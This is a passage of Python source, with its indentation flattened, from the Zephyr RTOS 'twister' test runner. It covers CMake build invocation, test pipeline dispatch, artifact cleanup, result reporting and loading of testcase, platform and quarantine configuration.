if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
            f'-DEXTRA_AFLAGS="{aflags}"',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
self.instance.fill_results_by_status()
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
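    # Worker-side dispatcher for pipeline messages. A test instance normally flows
    # cmake -> build -> run -> report -> cleanup; instances that fail, get filtered
    # out at cmake time, or are cmake-only short-circuit straight to "report".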
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total - results.skipped_configs
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done, total_tests_width, total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done) / total_to_do) * 100)
skipped = results.skipped_configs + results.skipped_runtime
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if skipped > 0 else Fore.RESET,
skipped,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
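# TestSuite drives a whole twister run: it discovers platforms and testcases,
# applies command-line filters, schedules ProjectBuilder jobs over a
# multiprocessing pipeline and finally writes the CSV/XML/JSON reports.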
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
        self.enable_size_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
self.pipeline = None
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None, initial=False):
results.skipped_configs = 0
results.skipped_cases = 0
for instance in self.instances.values():
if initial:
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total - results.skipped_configs,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
        of all test configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = [p.name for p in self.platforms]
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
